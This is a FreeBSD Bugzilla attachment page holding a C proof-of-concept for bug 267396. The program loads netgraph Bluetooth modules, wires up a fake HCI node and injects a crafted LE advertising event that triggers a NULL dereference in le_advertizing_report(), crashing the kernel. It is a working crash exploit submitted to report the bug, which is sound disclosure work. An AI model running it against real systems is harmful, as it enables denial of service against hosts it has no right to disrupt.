FreeBSD Bugzilla – Attachment 237685 Details for
Bug 267396
le_advertizing_report() calls NG_HCI_M_PULLUP() without checking for failure
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Help
|
New Account
|
Log In
Remember
[x]
|
Forgot Password
Login:
[x]
cause a NULL dereference in le_advertizing_report()
ng36a.c (text/plain), 3.07 KB, created by
Robert Morris
on 2022-10-27 17:13:05 UTC
(
hide
)
Description:
cause a NULL dereference in le_advertizing_report()
Filename:
MIME Type:
Creator:
Robert Morris
Created:
2022-10-27 17:13:05 UTC
Size:
3.07 KB
patch
obsolete
>#include <stdio.h> >#include <string.h> >#include <stdlib.h> >#include <unistd.h> >#include <sys/socket.h> >#include <sys/ioctl.h> >#include <netinet/in.h> >#include <sys/wait.h> >#include <sys/resource.h> >#include <arpa/inet.h> >#include <assert.h> >#include <ctype.h> >#include <fcntl.h> >#include <signal.h> >#include <netgraph.h> >#include <netgraph/ng_message.h> >#include <netgraph/ng_socket.h> >#include <netgraph/bluetooth/include/ng_hci.h> > >unsigned long long aa[] = { >0x7ffd00c100ull, >0x60bf00000000ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0xfe00000000000000ull, >0xcebf0000000000ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0xf340ull, >0x0ull, >}; >int aai; > >int >main(){ > system("kldload netgraph"); > system("kldload ng_btsocket"); > system("kldload ng_hci"); > > int cs = -1; > int ds = -1; > NgMkSockNode(NULL, &cs, &ds); > > struct ngm_mkpeer mkp; > memset(&mkp, 0, sizeof(mkp)); > strcpy(mkp.type, "hci"); > strcpy(mkp.ourhook, "xdrv"); > strcpy(mkp.peerhook, "drv"); > > if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE, > NGM_MKPEER, &mkp, sizeof(mkp)) < 0) { > fprintf(stderr, "netgraph mkpeer %s %s failed\n", mkp.type, mkp.peerhook); > } > > struct ngm_name name; > memset(&name, 0, sizeof(name)); > strcpy(name.name, "hci0"); > if(NgSendMsg(cs, ".:xdrv", NGM_GENERIC_COOKIE, > NGM_NAME, &name, sizeof(name)) < 0){ > perror("NgSendMsg NGM_NAME"); > exit(1); > } > > struct ngm_connect con; > memset(&con, 0, sizeof(con)); > strcpy(con.path, ".:xdrv"); > strcpy(con.ourhook, "xacl"); > strcpy(con.peerhook, "acl"); > > if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE, > NGM_CONNECT, &con, sizeof(con)) < 0) { > fprintf(stderr, "netgraph connect %s %s %s failed\n", con.path, con.ourhook, con.peerhook); > } > > memset(&con, 0, sizeof(con)); > strcpy(con.path, ".:xdrv"); > strcpy(con.ourhook, "xsco"); > strcpy(con.peerhook, "sco"); > > if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE, > NGM_CONNECT, &con, sizeof(con)) < 0) { > fprintf(stderr, "netgraph connect %s %s %s failed\n", con.path, con.ourhook, con.peerhook); > } > > memset(&con, 0, sizeof(con)); > strcpy(con.path, "btsock_hci_raw:"); > strcpy(con.ourhook, "raw"); > strcpy(con.peerhook, "raw"); > > if (NgSendMsg(cs, "hci0:", NGM_GENERIC_COOKIE, > NGM_CONNECT, &con, sizeof(con)) < 0) { > fprintf(stderr, "netgraph connect %s %s %s failed\n", con.path, con.ourhook, con.peerhook); > } > > system("hccontrol inquiry &"); > > { > char buf[2048]; > char hook[128]; > hook[0] = '\0'; > int x = NgRecvData(ds, (void*)buf, sizeof(buf), hook); > if(x <= 0){ > perror("NgRecvData"); > exit(1); > } > printf("NgRecvData -> %s %d\n", hook, x); > for(int i = 0; i < x; i++) > printf("%02x ", buf[i] & 0xff); > printf("\n"); > } > > char buf[256]; > memset(buf, 0xff, sizeof(buf)); > for(int i = 0; i+8 <= sizeof(buf); i += 8) > *(long long *)(buf + i) ^= aa[aai++]; > buf[0] = NG_HCI_EVENT_PKT; > NgSendData(ds, "xdrv", (unsigned char *)buf, sizeof(buf)); > > sleep(1); >}
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=237685">View the attachment on a separate page</a>.</b>
View Attachment As Raw
Actions:
View
Attachments on
bug 267396
: 237685